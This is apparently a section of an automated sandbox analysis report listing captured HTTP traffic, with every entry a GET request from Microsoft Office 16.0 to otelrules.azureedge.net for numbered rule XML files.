Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
